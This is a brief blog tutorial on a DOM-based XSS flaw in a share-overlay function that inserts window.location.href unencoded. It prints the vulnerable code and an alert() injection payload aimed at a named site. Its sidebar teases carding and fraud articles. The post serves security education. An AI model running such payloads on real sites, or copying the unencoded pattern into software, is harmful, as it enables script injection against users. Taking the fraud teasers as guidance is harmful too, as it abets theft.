Exploiting DOM Based Cross-site Scripting (XSS) [location.href]

I just recently found exploitable DOM Based XSS vulnerability because of Vulnerable JavaScript dependency(Jquery).

Okay, let see an example of vulnerable code.

function sfsi_mobile_jake_share(url) {
    if (jQuery('.sfsi_jake_follow_overlay')
        .length == 0) {
        jQuery('body')
            .append("<div class='sfsi_jake_follow_overlay sfsi_overlay show'><div class='sfsi_inner_display'><a class='close_btn' href='' onclick=\"event.preventDefault();close_overlay(\'.sfsi_jake_follow_overlay\')\" >×</a><div style='width:95%; min-height:80%;background-color:#fff;margin:0 auto;margin:30% auto;padding: 20px 0;'><div style='width:90%;margin: 0 auto;'><input type='text' value='" + window.location.href + "' style='width:100%;padding:7px 0;text-align:center' /></div><div style='width:80%;margin:10px auto 0 auto'><div class='sfsi_upload_butt_container' ><button onclick='sfsi_copy_text_parent_input(event)' class='upload_butt' >Copy</button></div><div class='sfsi_upload_butt_container' ><a href='weixin://' class='upload_butt'>Open This Element</a></div></div></div></div>");
        

Okay, as you can see in this code replacing “window.location.href” object without encoding, So means it’s vulnerable to execute malicious code lines.

Let’s exploit it!
First, visit that vulnerable website URL that using javascript dependency like that as I mentioned above.
Example: http://cyberscap.com/

Then add #’><img src=x onerror=alert(document.domain)>

After that your vulnerable website URL should be like this: http://cyberscap.com/#’><img src=x onerror=alert(document.domain)>

But it will no longer work on web browsers like Chrome. Cause they have a default encode for “location.href” object. Anyhow it’s still exploitable on Edge. etc…

Akalanka Ekanayakehttps://akalanka.uk
Dilakshan Akalanka Ekanayake, who is well-known as Akalanka Ekanayake is a popular and skilled music editor and programmer based in Sri Lanka. He is a musical artist, Cybersecurity researcher, Software engineer, and the Founder & CEO of Cyberscap. The passion that Akalanka has towards both music and tech has helped him to achieve a lot in both industries. Some of the most notable projects that he worked on include Crimes of the Future, Hacker(2019 ) and France(2021).

Related Stories

Advertisement

Discover

Scraping a website using the BeautifulSoup library (Python)

Full Code import requests from bs4 import BeautifulSoup url = "https://website.com" # send a request to the website response...

Creating a ChatGPT Discord Bot Step by Step (2023)

Prerequisites: Discord account Python 3.6 or higher OpenAI API Key Basic understanding of Python programming Setting up the environment: Install...

Starting Laravel 9 Project Within 8 Steps

Starting a Laravel project can seem overwhelming, but it's actually a simple process when...

Learn How To Manage Your Stress Using 10 Tips!

These days it is hard not to be weighed down once in a while....

Online Fraud Keywords Explained (Part 2)

Hey, Before reading this please read my first article about this title. (Part 1) PAYMENT...

Online/Physical Carding Explained (Online Fraud Part 1)

Fraud is something I have been doing for many years, even before internet fraud...

Popular Categories

Comments

LEAVE A REPLY

Please enter your comment!
Please enter your name here